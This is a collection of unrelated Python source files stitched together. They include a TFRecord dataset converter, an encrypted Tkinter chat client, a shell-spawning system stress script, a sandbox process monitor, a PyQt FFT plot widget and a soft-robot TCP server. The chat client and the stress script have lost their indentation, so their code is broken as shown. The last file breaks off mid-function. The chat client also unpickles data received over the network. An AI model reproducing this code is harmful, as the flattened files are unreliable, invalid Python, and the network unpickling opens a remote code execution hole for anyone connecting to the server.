_process_dataset('train', command_args.train_directory,
command_args.train_shards, command_args.labels_file, command_args)
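# A minimal reader sketch (not part of the original script) showing how records produced above
# can be parsed back with the same TF1-style API; the glob pattern is an assumption based on the
# '%s_%s_%.5d-of-%.5d.tfrecord' naming used in _process_image_files_batch.
def _parse_example_sketch(serialized_example):
    """Decode one serialized Example back into an image tensor and its label."""
    features = tf.parse_single_example(
        serialized_example,
        features={
            'image/encoded': tf.FixedLenFeature([], tf.string),
            'image/class/label': tf.FixedLenFeature([], tf.int64),
            'image/class/text': tf.FixedLenFeature([], tf.string),
            'image/height': tf.FixedLenFeature([], tf.int64),
            'image/width': tf.FixedLenFeature([], tf.int64),
        })
    image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
    return image, features['image/class/label']
# Example usage:
#   dataset = tf.data.TFRecordDataset(tf.gfile.Glob('<output_directory>/<dataset_name>_train_*.tfrecord'))
#   dataset = dataset.map(_parse_example_sketch)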
|
chatClient.py
|
#! /usr/bin/env python3
import os
import sys
import select
import socket
import pickle
import getpass
import threading
import time
from datetime import datetime
from tkinter import *
# Adding APIs directory to python system path
# sys.path.insert(-1, os.path.join(os.path.dirname
# (os.path.realpath(__file__)), 'APIs'))
# Local modules
from APIs.logging import Log
from APIs.security import *
GUI_OBJ = None
KEY = None
class GUI(object):
def __init__(self, master, network_obj):
global GUI_OBJ
self.master = master
self.network = network_obj
self.txt_input = Text(self.master, width=60, height=5)
self.txt_disp = Text(self.master, width=60, height=15, bg='light grey')
self.txt_input.bind('<Return>', self.get_entry)
self.txt_disp.configure(state='disabled')
self.txt_input.focus()
self.txt_disp.pack()
self.txt_input.pack()
self.flag = True
GUI_OBJ = self
def init_canvas(self):
self.canvas = Canvas(root, width=730, height=600)
self.canvas.pack(fill="both", expand=True)
def init_frame(self):
self.frame_left = Frame(self.canvas, height=400, width=200)
self.frame_right = Frame(self.canvas, width=500)
self.frame_right_chat_show = Frame(self.frame_right)
self.frame_right_chat_input = Frame(self.frame_right, width=460)
self.frame_right_chat_input_buttons = Frame(self.frame_right, width=40)
self.frame_left.pack(fill=Y, side='left')
self.frame_right.pack(fill=Y, side='left')
self.frame_right_chat_show.pack(fill=X, side='top')
self.frame_right_chat_input.pack(side='left')
self.frame_right_chat_input_buttons.pack(side='left')
# def init_textbox(self):
def update(self, msg):
'''
This method updates chat window
'''
msg = '\n' + msg
self.txt_disp.configure(state='normal')
self.txt_disp.insert(END, msg)
self.txt_disp.see(END)
self.txt_disp.configure(state='disabled')
def get_entry(self, *arg):
''' Gets input from the input field and uses
network object to send message to the server.
Finally clears input field to enter msg.
'''
# print(self.thread_name + ">> " + str(self.txt_input.get('1.0',END)))
msg_snd = self.txt_input.get('1.0', END)
msg_snd = msg_snd.strip('\n')
self.network.send_msg(msg_snd)
msg_snd = '<YOU> ' + msg_snd
self.update(msg_snd)
self.txt_input.delete('1.0', END)
def get_msg(self, *arg):
        ''' This method is run by a separate thread to keep
        receiving messages from the server and update the
        chat window.
        '''
while True:
msg_rcv = self.network.get_msg()
if msg_rcv:
msg_rcv = msg_rcv.strip('\n')
print('-' * 60)
print(msg_rcv)
self.update(msg_rcv)
class Network():
def __init__(self, thread_name, SRV_IP='', SRV_PORT=''):
''' Constructor to initialise network
connectivity between the client and server.
'''
self.SRV_IP = SRV_IP
self.SRV_PORT = int(SRV_PORT)
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.SRV_IP, self.SRV_PORT))
self.KEY_FLAG = False
self.priv_key = None
self.pub_key = None
def genRSA(self, *args):
# Generate Private and Public key for particular session
logging.log("Generating private and public key")
self.priv_key, self.pub_key = RSA_.genRSA()
logging.log("Keys generation completed.")
logging.log(self.pub_key.exportKey())
def initEncryption(self, userName):
global KEY
# Generate Private and Public key for particular session
#logging.log("Generating private and public key for %s", userName)
#priv, pub = RSA_.genRSA()
#logging.log("Keys generation completed.")
#logging.log(pub.exportKey())
# Prepare data for serialization as tuple
# can't be transmitted over network.
msg_send = (userName, self.pub_key)
msg_send = pickle.dumps(msg_send)
self.client.send(msg_send)
logging.log("User name along with public key has been sent to the server.")
# Wait for the server to send symmetric key
EnSharedKey = self.client.recv(1024)
EnSharedKey = pickle.loads(EnSharedKey)
print(EnSharedKey)
KEY = RSA_.decrypt(self.priv_key, EnSharedKey)
print(KEY)
if KEY:
logging.log("Unique key has been received")
self.KEY_FLAG = True
logging.log("Secure connection has been established.")
def get_msg(self):
if KEY != None:
msg_rcv = AES_.decrypt(KEY.encode(), self.client.recv(20000))
return msg_rcv
def send_msg(self, msg_snd):
if KEY is None:
# Send (userName, RSA_PublicKey) to the server
# to get encrypted symmetric key for further encryption.
self.initEncryption(msg_snd)
return
try:
print(msg_snd)
result = self.client.send(AES_.encrypt(KEY.encode(), msg_snd))
print("Bytes sent: ", result)
except Exception as e:
print(e)
GUI.update(GUI_OBJ, "Not connected to the server")
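# Handshake summary (as implemented above): the first message the user types is treated as the
# user name; send_msg() pickles (userName, RSA public key) and sends it to the server, which
# replies with the session's symmetric key encrypted with that public key. Once KEY is set,
# every subsequent message is AES-encrypted with KEY before being sent.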
# Outside class functions
def connection_thread(*args):
root = args[0]
retry_count = 0
gui_flag = False
while True:
try:
network = Network('network_thread', '127.0.0.1', 8080)
if gui_flag:
gui.network = network
if not gui_flag:
gui = GUI(root, network)
logging.log('Connected to the server')
gui.update('Connected to the server')
gui.update('Enter your name.')
break
except Exception as e:
msg = "[Retry {}] {}".format(retry_count+1, e)
logging.log(msg)
retry_count += 1
if retry_count == 1:
gui = GUI(root, None)
gui.update("Failed to connect the server.\n" +\
"Started retrying.")
gui.update("Retry connecting...")
time.sleep(5)
gui_flag = True
elif 4 > retry_count:
#logging.log('Retry connecting...')
#gui.update("Retry connecting...")
time.sleep(5)
gui_flag = True
elif retry_count == 5:
gui.update("Retry limit exceeded.\n" +\
"Unable to connect the server.\n" +\
"Program will automatically exit after 5 sec.")
time.sleep(5)
gui_flag = True
root.destroy()
logging.log('New thread has been initialized to fetch data from the server')
#threading._start_new_thread(network.genRSA, ())
rsa_thread = threading.Thread(target=network.genRSA, args=())
rsa_thread.start()
rsa_thread.join()
threading._start_new_thread(gui.get_msg,())
def main():
    root = Tk()  # initialize root window
root.title('ChatRoom')
threading._start_new_thread(connection_thread, (root,))
logging.log('Connection thread has been called')
root.mainloop()
logging.log('exiting main thread.')
logging.stop()
if __name__ == "__main__":
logging = Log(f_name='client_chatroom_' + datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))
opt = input('Enable logging? (y/N): ')
if opt in ('y', 'Y', 'yes', 'Yes', 'YES'):
# it will both save log_msg to a file and print to sys.stdout
logging.logging_flag = True
logging.validate_file()
main()
#TODO: client unable to determine if server is alive after chat has been started.
|
system_stress.py
|
#!/usr/bin/env python
# Copyright (c) 2014-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from multiprocessing import Process, Lock, Value
import subprocess
import argparse
import socket
import fcntl
import struct
import timeit
P = 3298723423324
# See: http://stackoverflow.com/questions/24196932/how-can-i-get-the-ip-address-of-eth0-in-python
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def largest_prime_factor(n):
i = 2
while i * i <= n:
if n % i:
i += 1
else:
n //= i
return n
def init(e, po, n, j, l, count):
subprocess.call("echo 'hi' > /dev/null", shell=True)
netcat(e, po, "hello")
l.acquire()
try:
count.value = count.value + 1
finally:
l.release()
if j >= n:
largest_prime_factor(P)
return
procs = []
for i in xrange(n):
p = Process(target=init, args=(e, po, n, j + i + 1, l, count))
p.start()
procs.append(p)
for p in procs:
p.join()
# See: http://stackoverflow.com/questions/1908878/netcat-implementation-in-python
def netcat(hostname, port, content):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((hostname, int(port)))
s.sendall(content)
s.shutdown(socket.SHUT_WR)
s.close()
def expect(n):
return (2**n) * n
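# For example, with the default intensity -n 4 this expects (2**4) * 4 = 64 shell invocations.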
def main(args):
e = get_ip_address(args.i)
k = expect(args.n)
print ("Expecting %d (default shell) processes" % k)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((e, args.p))
c = Value('i', 0)
l = Lock()
for i in xrange(args.n):
init(e, args.p, args.n, i, l, c)
print("Executed %d (default shell) processes" % c.value)
return 0
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=("Place the system under stress."
" This will launch lots of shells and each will connect to a UDP socket."))
parser.add_argument("-n", type=int, default=4, help="Expotential intensity")
parser.add_argument("-i", required=True, help="Network interface for socket actions")
parser.add_argument("-p", type=int, default=9090, help="Local network UDP port")
args = parser.parse_args()
start = timeit.default_timer()
main(args)
print("Elapsed: " + str(timeit.default_timer() - start))
|
local.py
|
# vim:ts=4:sts=4:sw=4:expandtab
import datetime
import math
import os
import pathlib
import pwd
import resource
import signal
import tempfile
import time
import threading
import traceback
import kolejka.common.subprocess
from kolejka.judge import config
from kolejka.judge.result import Result
from kolejka.judge.systems.base import *
from kolejka.judge.parse import *
__all__ = [ 'LocalSystem' ]
def __dir__():
return __all__
page_size = int(os.sysconf("SC_PAGE_SIZE"))
clock_ticks = int(os.sysconf("SC_CLK_TCK"))
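# The /proc parsing below follows the field layout documented in proc(5):
#   /proc/<pid>/stat   field  4 = ppid, 14 = utime, 15 = stime, 20 = num_threads, 22 = starttime
#                      (times are in clock ticks)
#   /proc/<pid>/statm  field  2 = resident set size, in pages
#   /proc/<pid>/io     'rchar' / 'wchar' = characters read / written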
def proc_info(pid):
proc = pathlib.Path('/proc/'+str(pid))
with pathlib.Path('/proc/uptime').open() as uptime_file:
uptime = float(uptime_file.read().strip().split()[0])
try:
with ( proc / 'stat' ).open() as stat_file:
stat = stat_file.read().strip().split()
with ( proc / 'statm' ).open() as statm_file:
statm = statm_file.read().strip().split()
with ( proc / 'io' ).open() as io_file:
io = dict( [ (k.strip().lower(), int(v.strip())) for k,v in [ l.split(':') for l in io_file.read().strip().split('\n') ] ] )
result = dict()
result['ppid'] = int(stat[3])
result['cpu_user'] = int(stat[13]) / clock_ticks
result['cpu_sys'] = int(stat[14]) / clock_ticks
result['rss'] = int(statm[1]) * page_size
result['threads'] = int(stat[19])
result['read'] = io['rchar']
result['write'] = io['wchar']
result['real_time'] = uptime - int(stat[21]) / clock_ticks
return result
except:
return None
def proc_ppid(pid):
proc = pathlib.Path('/proc/'+str(pid))
try:
with ( proc / 'stat' ).open() as stat_file:
stat = stat_file.read().strip().split()
return int(stat[3])
except:
return None
def proc_pids():
proc = pathlib.Path('/proc')
return [ int(p.name) for p in proc.iterdir() if p.is_dir() and not p.is_symlink() and p.name.isdigit() ]
def proc_ppids():
result = dict()
for p in proc_pids():
pp = proc_ppid(p)
if pp is not None:
result[p] = pp
return result
def proc_children(pid):
return [ p for p in proc_pids() if proc_ppid(p) == pid ]
def proc_descendants(pid):
parents = proc_ppids()
children = dict([ (p,list()) for p in parents.values() ])
for child, parent in parents.items():
children[parent].append(child)
new_descendants = [ pid ]
all_descendants = []
while new_descendants:
active = new_descendants
new_descendants = []
for p in active:
all_descendants += children.get(p,[])
new_descendants += children.get(p,[])
return all_descendants
def monitor_safe_process(process, limits, result):
while True:
info = proc_info(process.pid)
if info is None:
break
result.update_memory(info['rss'])
result.update_real_time(info['real_time'])
result.update_cpu_time(info['cpu_user'] + info['cpu_sys'])
if limits.cpu_time and result.cpu_time > limits.cpu_time:
process.kill()
if limits.real_time and result.real_time > limits.real_time:
process.kill()
if limits.memory and result.memory > limits.memory:
process.kill()
time.sleep(0.05)
def end_process(process):
try:
pids = proc_descendants(process.pid)
try:
process.terminate()
time.sleep(0.1)
except:
pass
for pid in pids:
try:
                os.kill(pid, signal.SIGKILL)
except:
pass
while True:
pids = proc_descendants(process.pid)
if pids:
for pid in pids:
try:
                        os.kill(pid, signal.SIGKILL)
except:
pass
else:
break
except:
pass
def monitor_process(process, limits, result):
real_time = dict()
cpu_time = dict()
while True:
info = proc_info(process.pid)
if info is None:
break
memory = info['rss']
real_time[process.pid] = info['real_time']
cpu_time[process.pid] = info['cpu_user'] + info['cpu_sys']
infos = dict([ (pid, proc_info(pid)) for pid in proc_descendants(process.pid) ])
for pid, info in infos.items():
if info is None:
continue
memory += info['rss']
real_time[pid] = max(real_time.get(pid,0), info['real_time'])
cpu_time[pid] = max(cpu_time.get(pid,0), info['cpu_user'] + info['cpu_sys'])
result.update_memory(memory)
result.update_real_time(sum(real_time.values()))
result.update_cpu_time(sum(cpu_time.values()))
if limits.cpu_time and result.cpu_time > limits.cpu_time:
end_process(process)
if limits.real_time and result.real_time > limits.real_time:
end_process(process)
if limits.memory and result.memory > limits.memory:
end_process(process)
time.sleep(0.05)
class LocalSystem(SystemBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.output_directory.mkdir(parents=True, exist_ok=True)
def get_superuser(self):
return os.getuid() == 0
def get_current_user(self):
return pwd.getpwuid(os.getuid()).pw_name
def get_resources(self, limits):
resources = dict()
for limit in [
resource.RLIMIT_CORE,
resource.RLIMIT_CPU,
# resource.RLIMIT_FSIZE,
resource.RLIMIT_DATA,
resource.RLIMIT_STACK,
# resource.RLIMIT_RSS,
# resource.RLIMIT_NPROC,
# resource.RLIMIT_NOFILE,
# resource.RLIMIT_MEMLOCK,
# resource.RLIMIT_AS,
# resource.RLIMIT_MSGQUEUE,
# resource.RLIMIT_NICE,
# resource.RLIMIT_RTPRIO,
# resource.RLIMIT_RTTIME,
# resource.RLIMIT_SIGPENDING,
]:
resources[limit] = (resource.RLIM_INFINITY, resource.RLIM_INFINITY)
resources[resource.RLIMIT_CORE] = (0,0)
if limits.cpu_time:
seconds = int(math.ceil((limits.cpu_time + parse_time('1s')).total_seconds()))
resources[resource.RLIMIT_CPU] = (seconds, seconds)
if limits.memory:
            # Allow a small headroom above the configured limit, mirroring the cpu_time handling above.
            memory = int(math.ceil(limits.memory + parse_memory('1mb')))
            resources[resource.RLIMIT_DATA] = (memory, memory)
return resources
def execute_safe_command(self, command, stdin_path, stdout_path, stdout_append, stdout_max_bytes, stderr_path, stderr_append, stderr_max_bytes, environment, work_path, user, group, limits, result):
stdin_file = self.read_file(stdin_path)
stdout_file, stdout_writer = self.file_writer(stdout_path, stdout_append, max_bytes=stdout_max_bytes)
stderr_file, stderr_writer = self.file_writer(stderr_path, stderr_append, max_bytes=stderr_max_bytes)
writers = (stdout_writer, stderr_writer)
change_user, change_group, change_groups = self.get_user_group_groups(user, group)
resources = self.get_resources(limits)
#resources[resource.RLIMIT_NPROC] = (1,1) #This is a very bad idea, read notes in man execv on EAGAIN
process = kolejka.common.subprocess.start(
command,
user=change_user,
group=change_group,
groups=change_groups,
resources=resources,
stdin=stdin_file,
stdout=stdout_file,
stderr=stderr_file,
env=environment,
cwd=work_path,
)
stdin_file.close()
stdout_file.close()
stderr_file.close()
monitoring_thread = threading.Thread(target=monitor_safe_process, args=(process, limits, result))
monitoring_thread.start()
returncode = process.wait()
monitoring_thread.join()
for writer in writers:
writer.join()
result.set_returncode(returncode)
def start_command(self, command, stdin_path, stdout_path, stdout_append, stdout_max_bytes, stderr_path, stderr_append, stderr_max_bytes, environment, work_path, user, group, limits):
stdin_file = self.read_file(stdin_path)
stdout_file, stdout_writer = self.file_writer(stdout_path, stdout_append, max_bytes=stdout_max_bytes)
stderr_file, stderr_writer = self.file_writer(stderr_path, stderr_append, max_bytes=stderr_max_bytes)
writers = (stdout_writer, stderr_writer)
change_user, change_group, change_groups = self.get_user_group_groups(user, group)
resources = self.get_resources(limits)
process = kolejka.common.subprocess.start(
command,
user=change_user,
group=change_group,
groups=change_groups,
resources=resources,
stdin=stdin_file,
stdout=stdout_file,
stderr=stderr_file,
env=environment,
cwd=work_path,
)
stdin_file.close()
stdout_file.close()
stderr_file.close()
result = Result()
monitoring_thread = threading.Thread(target=monitor_process, args=(process, limits, result))
monitoring_thread.start()
return (process, monitoring_thread, result, writers)
def terminate_command(self, process):
process, monitoring_thread, monitor_result, writers = process
process.terminate()
for writer in writers:
writer.join()
def wait_command(self, process, result):
process, monitoring_thread, monitor_result, writers = process
completed = kolejka.common.subprocess.wait(process)
monitoring_thread.join()
for writer in writers:
writer.join()
result.update_memory(monitor_result.memory)
result.update_real_time(monitor_result.real_time)
result.update_cpu_time(monitor_result.cpu_time)
result.update_real_time(completed.time)
result.set_returncode(completed.returncode)
|
mplsmall_FFT.py
|
from PyQt5.QtWidgets import *
import matplotlib.pyplot as plt
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from PyQt5 import QtCore
import threading
from PyQt5.Qt import QPoint, QRect
class mplsmall_FFT(QWidget):
def __init__(self,parent=None):
QWidget.__init__(self)
self.setMaximumHeight(60)
self.verticalLayout = QVBoxLayout(self)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.scrollArea = QScrollArea(self)
self.scrollArea.setWidgetResizable(False)
self.scrollArea.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.scrollArea.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.figure = plt.figure() #QWidget //FigureCanvas//Figure// subplot
self.axes = self.figure.add_subplot(1, 1, 1)
self.canvas = FigureCanvas(self.figure) # FigureCanvas//Figure// called canvas
self.figure.set_facecolor("black")
self.scrollArea.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Maximum)
self.scrollArea.setContentsMargins(0, 0, 0, 0)
self.scrollArea.setStyleSheet("border:0px;padding:0px")
self.scrollArea.setWidget(self.canvas)
self.verticalLayout.addWidget(self.scrollArea)
self.canvas.mpl_connect('draw_event',self.On_Canvas_drawn)
self.plot_list=[]
self.line_list=[]
self.canvas.setFocusPolicy( QtCore.Qt.ClickFocus )
#self.canvas.mpl_connect('key_press_event', self.mpEvent)
self.canvas.mpl_connect('button_press_event', self.mouse_pressed)
self.canvas.mpl_connect('button_release_event', self.mouse_released)
self.canvas.mpl_connect('motion_notify_event',self.mouse_in_motion)
self.is_clicked=False
self.green_clicked=False
self.rescale_done_by_selection=False
def init_fig(self,parent):
self.main=parent
#self.axes = self.figure.add_subplot(1, 1, 1)
self.axes.set_in_layout(False)
self.axes.patch.set_facecolor('xkcd:black')
self.axes.set_yticklabels([])
self.figure.tight_layout(pad=0, w_pad=None, h_pad=None)
self.fft_zoomwin=self.main.fftW.zoomwin
#####################################events############################################
def resizeEvent(self,event):
QWidget.resizeEvent(self, event)
print("small Win resized")
def showEvent(self, event):
QWidget.showEvent(self, event)
print("shown_small")
def On_Canvas_drawn(self,draw_event):
print("Draw_evt_on FFT_small")
def mouse_pressed(self, e):
print("pressed")
#######################################PLOT#################################################
def addplot_(self,x_,y_,ch_color,xlimit,ylimit):
plot_ = self.axes.plot(x_,y_,color=ch_color)
self.axes.set_yticklabels([])
self.axes.set(xlim=xlimit,ylim=ylimit,autoscale_on=False)
self.plot_list.append(plot_)
self.line_list.append(plot_[0])
self.fft_zoomwin.addplot_(x_,y_,ch_color,xlimit)
def plot_refresh(self):
        # Pass the bound method itself as the thread target (calling it here would run it synchronously).
        draw_thrd = threading.Thread(target=self.canvas.draw_idle)
        draw_thrd.start()
self.fft_zoomwin.plot_refresh()
def rem_plot_0(self):
self.plot_list[0][0].remove()
self.plot_list=[]
self.line_list=[]
self.fft_zoomwin.rem_plot_0()
def edit_plot(self,plot_num,x_,y_,ch_color,x_limit):
self.plot_list[plot_num][0].remove()
plot_=self.axes.plot(x_,y_, color=ch_color)
self.plot_list[plot_num]=plot_
self.line_list[plot_num]=plot_[0]
self.axes.set_xlim(x_limit[0],x_limit[1])
print("small limit:",x_limit[0],x_limit[1])
self.fft_zoomwin.edit_plot(plot_num,x_,y_,ch_color,x_limit)
def change_color(self,lineno,col):
self.axes.get_lines()[lineno].set_color(col)
self.fft_zoomwin.change_color(lineno,col)
def mouse_pressed(self, e):
if self.main.fftW.small_view_start_pos<e.x and e.x<self.main.fftW.small_view_end_pos:
print("clk_inside")
self.click_pos=e.x
self.Scroll_val_at_clicked=self.main.FFT_Widget.scrollArea.horizontalScrollBar().value()
main_c_width=self.main.FFT_Widget.canvas.size().width()
self.width_ratio=main_c_width/self.canvas.size().width()
self.is_clicked=True
print("CLICKED_VAL:",self.Scroll_val_at_clicked)
elif e.x>self.main.fftW.CoordMin and e.x<self.main.fftW.CoordMax and self.main.fftW.rescalex_Out_ranged:
self.canvas_width=self.canvas.size().width()
self.click_pos=e.x
self.green_clicked=True
print("pressed")
def mouse_released(self,e):
self.is_clicked=False
if self.green_clicked==True:
mid_pt=((self.main.fftW.CoordMin+self.main.fftW.CoordMax)/2)+self.change_in_pos###start_pos+(end_pos-start_pos)/2
self.reseted_mid=self.main.fftW.fftsmall_px2pt.transform((mid_pt,0))[0]
self.green_clicked=False
self.rescale_done_by_selection=True
            if hasattr(self, "scale_thread"):
                if self.scale_thread.is_alive():
                    self.scale_thread.join() # threading.Thread cannot be cancelled; wait for the previous rescale to finish
self.scale_thread=threading.Thread(target=self.main.fftW.rescale_x)
self.scale_thread.start()
def mouse_in_motion(self,e):
if self.is_clicked==True:
print("CLICKED_VAL:",self.Scroll_val_at_clicked,"pos:",e.x,"change_in_pos:",(e.x-self.click_pos))
change_in_pos=(e.x-self.click_pos)*self.width_ratio
self.main.FFT_Widget.scrollArea.horizontalScrollBar().setValue(self.Scroll_val_at_clicked+change_in_pos)
elif self.green_clicked==True:
change_in_pos=(e.x-self.click_pos)
if (self.main.fftW.CoordMin+change_in_pos)>0 and (self.main.fftW.CoordMax+change_in_pos)<self.canvas_width:
self.change_in_pos=change_in_pos
self.rubberbands_draw_shifted(self.change_in_pos)
############################################Redraw_Rubberbands########################################
def rubberbands_draw_shifted(self,ch_in_pos):
self.main.fftW.rubberBand_red.hide()
self.main.fftW.rubberBand_red1.hide()
self.main.fftW.rubberBand.setGeometry(QRect(QPoint(int(self.main.fftW.CoordMin+self.change_in_pos),0),QPoint(int(self.main.fftW.small_view_start_pos+self.change_in_pos),60)))
self.main.fftW.rubberBand1.setGeometry(QRect(QPoint(int(self.main.fftW.small_view_end_pos+self.change_in_pos),0),QPoint(int(self.main.fftW.CoordMax+self.change_in_pos),60)))
#changelog
#change: when rescaled out of range, the small plot no longer rescales along with the main plot, which was unwanted behaviour for the small plot
|
baseSoftRobot.py
|
import multiprocessing
import socket
import struct
from ctypes import c_bool
import time
#---------------------------------------------------------------------
#- main SoftRC class -------------------------------------------------
class baseSoftRobot:
def __init__(self,nSensors,port):
self.nSensors = nSensors
## Set up TCP server
# Set up socket
host = ''
        self.port = port
        server_address = (host, port)
self.clients = []
self.control_processes = []
self.comm_processes = []
self.clients_addresses = []
        self.buffersize = 8*self.nMotors # 8 bytes per double; self.nMotors (and motorsValues/sensorsValues) are expected to be set by the child class before this __init__ runs
self.socket_TCP = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket_TCP.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket_TCP.bind(server_address)
## Multiprocessing
if self.nSensors > 0:
self.sensorsUpdated = multiprocessing.Array(c_bool,[False]*self.nSensors)
self.stopFlag = multiprocessing.Value(c_bool,False)
print("port: ",self.port)
print("i2c: ",self.port)
#---------------------------------------------------------------------
    #- main SoftRC class -------------------------------------------------
def waitForClient(self):
"""Automatically accept one incoming client"""
self.socket_TCP.listen(1)
print("TCP server is running. Waiting for client...")
client, client_address = self.socket_TCP.accept()
print("Client ",client_address," connected. Comm's ready!")
client.settimeout(1)
time.sleep(0.9)
self.clients.append(client)
self.clients_addresses.append(client_address)
def repeatedlySend(self):
"""Send data to all clients until stopFlag == True"""
while not self.stopFlag.value:
if all(self.sensorsUpdated):
try:
data = struct.pack('d'*len(self.sensorsValues),*self.sensorsValues)
for client in self.clients:
client.sendall(data)
for i in range(self.nSensors):
self.sensorsUpdated[i] = False
except Exception as e:
print('Send failed')
print(e)
self.stopFlag.value = True
break
self.socket_TCP.close()
def receive(self):
while not self.stopFlag.value:
try:
raw = self.clients[0].recv(self.buffersize)
# print('Data received')
unpackedData = struct.unpack('d'*int(self.buffersize/8),raw)
for i in range(int(self.buffersize/8)):
self.motorsValues[i]=unpackedData[i]
except Exception as e:
print('Error in receive: ',e)
self.stopFlag.value = True
self.socket_TCP.close()
def readSensors(self):
raise NotImplementedError("readSensors must be implemented in the child class")
def controlActuators(self):
raise NotImplementedError("controlActuators must be implemented in the child class")
def createProcesses(self):
## Processes to read sensors
for i in range(self.nSensors):
self.control_processes.append(multiprocessing.Process(target=self.readSensors, args=(i,)))
## Process to control the motors
self.control_processes.append(multiprocessing.Process(target=self.controlActuators))
## Processes for TCP/IP comm
self.comm_processes.append(multiprocessing.Process(target=self.repeatedlySend))
self.comm_processes.append(multiprocessing.Process(target=self.receive))
def run_control(self):
for p in self.control_processes:
p.start()
def run_comm(self):
for p in self.comm_processes:
p.start()
def run(self):
self.run_control()
self.waitForClient()
self.run_comm()
    def waitForProcesses(self):
        for p in self.control_processes + self.comm_processes:
            p.join()
#---------------------------------------------------------------------
#- base template for sensor class ---------------------------------------
class baseSensor:
def __init__(self, sensorInstance):
self.instance = sensorInstance
def readSensor(self):
raise NotImplementedError("readSensor must be implemented in the child class")
|
convert_tfrecords_mislabelled.py
|
# Copyright 2018 Changan Wang
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import xml.etree.ElementTree as xml_tree
import numpy as np
import six
import tensorflow as tf
import dataset_common
'''How to organize your dataset folder:
VOCROOT/
|->VOC2007/
| |->Annotations/
| |->ImageSets/
| |->...
|->VOC2012/
| |->Annotations/
| |->ImageSets/
| |->...
|->VOC2007TEST/
| |->Annotations/
| |->...
'''
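# Example invocation (the paths below are placeholders; point --dataset_directory at your VOCROOT):
#   python convert_tfrecords_mislabelled.py --dataset_directory=/path/to/VOCROOT \
#       --output_directory=./tfrecords --train_shards=16 --validation_shards=16 --num_threads=8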
tf.app.flags.DEFINE_string('dataset_directory', '.',
                           'Root directory of all data')
tf.app.flags.DEFINE_string('train_splits', 'VOC2007, VOC2012',
'Comma-separated list of the training data sub-directory')
tf.app.flags.DEFINE_string('validation_splits', 'VOC2007TEST',
'Comma-separated list of the validation data sub-directory')
tf.app.flags.DEFINE_string('output_directory', './tfrecords',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 16,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 16,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
RANDOM_SEED = 180428
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_list_feature(value):
"""Wrapper for inserting a list of bytes features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if isinstance(value, six.string_types):
value = six.binary_type(value, encoding='utf-8')
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_name, image_buffer, bboxes, labels, labels_text,
difficult, truncated, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
bboxes: List of bounding boxes for each image
labels: List of labels for bounding box
labels_text: List of labels' name for bounding box
    difficult: List of ints indicating the difficulty of that bounding box
    truncated: List of ints indicating the truncation of that bounding box
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
ymin = []
xmin = []
ymax = []
xmax = []
for b in bboxes:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([ymin, xmin, ymax, xmax], b)]
# pylint: enable=expression-not-assigned
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/channels': _int64_feature(channels),
'image/shape': _int64_feature([height, width, channels]),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature(labels),
'image/object/bbox/label_text': _bytes_list_feature(labels_text),
'image/object/bbox/difficult': _int64_feature(difficult),
'image/object/bbox/truncated': _int64_feature(truncated),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(image_name.encode('utf8')),
'image/encoded': _bytes_feature(image_buffer)}))
return example
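# The helper below is an illustrative sketch and is not called anywhere in this
# script: it shows how the Example protos written by _convert_to_example can be
# parsed back, with a feature spec mirroring a subset of the keys defined above.
def _example_parse_sketch(serialized_example):
  features = {
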